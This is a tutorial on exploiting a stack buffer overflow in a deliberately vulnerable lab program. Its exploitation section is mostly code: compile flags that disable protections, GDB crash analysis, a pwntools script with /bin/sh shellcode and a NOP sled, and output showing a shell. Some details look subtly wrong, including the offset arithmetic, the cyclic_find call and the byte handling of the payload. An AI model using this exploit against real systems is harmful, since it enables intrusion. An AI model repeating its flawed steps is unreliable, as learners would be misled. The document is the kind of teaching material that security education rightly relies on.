How to Find and Exploit a Simple Buffer Overflow Vulnerability

Introduction

In the world of software security, the buffer overflow is a classic, almost legendary, vulnerability. First widely publicized by the Morris Worm in 1988, it’s a bug that arises from a simple mistake: writing more data into a fixed-size block of memory (a “buffer”) than it was allocated to hold. This overflow can corrupt adjacent memory, crash the program, or, in the hands of an attacker, be weaponized to hijack the program’s execution flow and run arbitrary code.

While modern languages and compilers have introduced many safeguards, buffer overflows are still a serious threat, especially in performance-critical C and C++ codebases, firmware, and legacy systems. Understanding how to find and exploit one is a rite of passage for any security researcher or aspiring exploit developer.

This post will guide you through the entire process of finding, analyzing, and writing a proof-of-concept exploit for a simple stack-based buffer overflow vulnerability. Our target will be a small, intentionally vulnerable C program. Our goal is to take control of the application and spawn a command shell.

Tools & Environment Setup

To follow along, you’ll need a Linux environment. A virtual machine running a distribution like Ubuntu 22.04 or Kali Linux is perfect.

Here are the tools we’ll be using:

GCC (GNU Compiler Collection): The standard C compiler on Linux.
GDB (GNU Debugger): A powerful debugger for analyzing our program’s state at runtime. We’ll enhance it with pwndbg, a GDB extension that makes exploit development much easier.
Python 3 with pwntools: A god-tier CTF framework and exploit development library that simplifies process interaction, payload generation, and much more.

1. Install The Essentials:

sudo apt-get update
sudo apt-get install -y build-essential gdb python3 python3-pip

2. Install pwntools:

pip3 install pwntools

3. Install pwndbg:

git clone https://github.com/pwndbg/pwndbg
cd pwndbg
./setup.sh

With our lab ready, let’s create our vulnerable target.

Static Analysis: Finding the Flaw

Static analysis involves examining the code without running it. It’s often the first step in identifying potential vulnerabilities.

The Vulnerable Code

Here is our target application. Save this code as vuln.c.

// vuln.c
#include <stdio.h>
#include <string.h>

void vulnerable_function(char *input) {
    char buffer[100]; // A small, fixed-size buffer
    strcpy(buffer, input); // Uh oh! No size check.
    printf("You entered: %s\n", buffer);
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("Usage: %s <input>\n", argv[0]);
        return 1;
    }
    vulnerable_function(argv[1]);
    return 0;
}

The bug is in the vulnerable_function. It uses strcpy() to copy the command-line argument directly into a 100-byte buffer. The strcpy() function doesn’t perform any bounds checking; it will happily write past the end of the buffer if the input is longer than 99 characters (plus one for the null terminator). This is our buffer overflow.

Compiling for Exploitation

Modern compilers have protections that can make exploitation harder. For this tutorial, we will disable them to focus on the core concepts.

-fno-stack-protector: Disables stack canaries, which are designed to detect stack buffer overflows.
-z execstack: Makes the stack executable. Modern systems have a non-executable (NX) stack to prevent shellcode from running, but this flag overrides it.
-no-pie: Disables Position-Independent Executable, which makes it easier to predict memory addresses.

Compile the code with these flags:

gcc -fno-stack-protector -z execstack -no-pie -o vuln vuln.c

You now have an executable file named vuln.

Dynamic Analysis & Fuzzing: Making it Crash

Now let’s run the program and see if we can trigger the vulnerability. The goal is to provide an input so large that it overwrites critical data on the stack, specifically the return address. The return address tells the CPU where to go back to after the current function (vulnerable_function) finishes. If we can control it, we can control the program.

1. A Simple Crash

Let’s start by feeding it a long string of ‘A’s. Python is great for this.

./vuln $(python3 -c "print('A'*200)")

You should see a Segmentation fault. This is a good sign! It means we wrote data where we shouldn’t have and the program tried to execute an invalid memory address.

2. Analyzing the Crash in GDB

Let’s see exactly what happened using GDB with pwndbg.

gdb ./vuln

Inside GDB, run the program with the same oversized input:

pwndbg> run $(python3 -c "print('A'*200)")

The program will crash, and pwndbg will give you a beautiful, color-coded view of the CPU state. Look for the instruction pointer register (RIP on 64-bit, EIP on 32-bit).

...
Program received signal SIGSEGV, Segmentation fault.
...
──────────────────────────[ REGISTERS ]──────────────────────────
...
RIP: 0x4141414141414141
...

0x41 is the hexadecimal representation of the ASCII character ‘A’. Seeing 0x4141414141414141 in RIP is the “Eureka!” moment. It proves that we have successfully overwritten the return address on the stack and can now control where the program executes next.

3. Finding the Exact Offset

We know we can control RIP, but we need to know exactly how many bytes of input it takes to do so. We’ll use a unique, non-repeating pattern of characters called a De Bruijn sequence.

First, generate a pattern using pwntools:

python3 -c "from pwn import *; print(cyclic(200).decode())"
# Output will be something like: aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaama...

Now, run the program in GDB with this pattern as input:

pwndbg> run $(python3 -c "from pwn import *; print(cyclic(200).decode())")

The program crashes again. This time, look at the value in RIP. It will be a unique sequence of characters.

...
RIP: 0x6161616a61616169 ('iaaj')
...

We can use pwntools to find the offset of this sequence within our pattern:

python3 -c "from pwn import *; print(cyclic_find(0x6161616a61616169))"
# Output:
# 108

This tells us that the return address is located 108 bytes after the start of our buffer. Our payload structure is now: 108 bytes of junk, followed by the address we want to jump to.

Vulnerability & Exploitation Walkthrough

We have all the pieces. Let’s build the exploit. Our strategy is:

Craft a payload containing malicious code (shellcode) that spawns a /bin/sh shell.
Place this payload into the buffer.
Overwrite the return address with the memory address of our shellcode.

1. Preparing the Payload

Our payload will have three parts:

NOP Sled: A series of “No-Operation” instructions (\x90). If our jump address is slightly off, the CPU will slide down the NOPs until it hits our shellcode.
Shellcode: The actual machine code to execute.
Return Address: The address on the stack where our NOP sled begins.

Let’s use pwntools to create a Python exploit script. Save this as exploit.py:

# exploit.py
from pwn import *

# Set the context for our target architecture
context.update(arch='amd64', os='linux')

# Our shellcode to spawn /bin/sh
# This can be generated with: asm(shellcraft.sh())
shellcode = b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x0f\x05"

# The offset to the return address we found earlier
offset = 108

# We need to find where our buffer is located in memory.
# We'll do this by running the program under GDB and setting a breakpoint.
# Let's assume after debugging we find it starts around 0x7fffffffdc50.
# Because of the NOP sled, we don't have to be exact.
# Note: This address will CHANGE if you don't disable ASLR system-wide.
return_address = p64(0x7fffffffdc50)

# A sled of 16 NOPs
nop_sled = b"\x90" * 16

# Construct the final payload
payload = nop_sled + shellcode
payload += b"A" * (offset - len(payload)) # Padding
payload += return_address

# Print the payload to be used as a command-line argument
print(payload.decode('latin-1'))

2. Finding the Return Address

The return_address in the script above is a placeholder. We need to find the actual address of our buffer on the stack.

Start vuln in GDB: gdb ./vuln. Set a breakpoint at the strcpy call to inspect the memory just before the overflow happens.

pwndbg> b vulnerable_function
Breakpoint 1 at 0x40114e: file vuln.c, line 6.
pwndbg> run AAAA
...
Breakpoint 1, vulnerable_function (input=0x7fffffffdfe6 "AAAA") at vuln.c:6
6       strcpy(buffer, input);

Now, examine the stack. The buffer is a local variable, so it will be located near the stack pointer (RSP).

pwndbg> p $rsp
$1 = (void *) 0x7fffffffdb90
pwndbg> x/100xb $rsp
0x7fffffffdb90: 0x00 0x00 0x00 ...

The address 0x7fffffffdb90 is where our 100-byte buffer starts. This is a perfect target for our return address. Let’s update our exploit.py script with this address (your address will be slightly different).

# In exploit.py
...
# Update with the address you found in GDB
return_address = p64(0x7fffffffdb90)
...

3. Gaining the Shell

Let’s execute the final exploit. We’ll run vuln and pass the output of our Python script as its argument.

# First, generate the payload and save it to a file to avoid shell interpretation issues
python3 exploit.py > payload.bin

# Now, run the exploit!
./vuln $(cat payload.bin)

# If successful, you won't see any output, but you will have a new shell!
whoami
app-user
ls -la
total 28
drwxr-xr-x 3 app-user app-user 4096 Nov 11 01:41 .
drwxr-xr-x 4 app-user app-user 4096 Nov 11 01:41 ..
-rwxr-xr-x 1 app-user app-user 16808 Nov 11 01:41 vuln
-rw-r--r-- 1 app-user app-user 302 Nov 11 01:41 vuln.c
-rw-r--r-- 1 app-user app-user 451 Nov 11 01:41 exploit.py
-rw-r--r-- 1 app-user app-user 121 Nov 11 01:41 payload.bin
$ exit

Success! We overflowed the buffer, redirected execution to our shellcode, and gained control of the system.

Mitigation & Conclusion

We successfully exploited this program because we disabled several key security features. In the real world, these protections are almost always enabled.

How to Prevent Buffer Overflows:

Secure Coding: The root cause was using strcpy(). Developers should always use bounds-checked functions like strncpy() or snprintf() that require specifying the buffer size.
Stack Canaries: The -fstack-protector flag we disabled places a random value (a “canary”) on the stack before the return address. Before a function returns, it checks if the canary is intact. Our overflow would have corrupted it, causing the program to safely abort instead of jumping to our shellcode.
Non-Executable Stack (NX / DEP): We used -z execstack to make the stack executable. On a modern system, trying to execute code from the stack would result in a crash. Attackers bypass this using advanced techniques like Return-Oriented Programming (ROP), which reuses small snippets of existing code (“gadgets”) to perform actions.
Address Space Layout Randomization (ASLR): ASLR randomizes the starting addresses of the stack, heap, and libraries each time the program runs. This would have made it impossible for us to hardcode the return address. Bypassing ASLR often requires an additional information leak vulnerability.

Conclusion

This walkthrough demonstrates the fundamental mechanics of a stack-based buffer overflow. We moved from static analysis of source code to dynamic fuzzing, pinpointing the offset to control the instruction pointer, and finally crafting a payload to achieve code execution. While this was a simplified example, the core principles apply to far more complex scenarios. This exercise highlights the critical importance of secure coding and the layered defense-in-depth security mechanisms built into modern operating systems and compilers.

A Practical Guide to Extracting and Analyzing IoT Firmware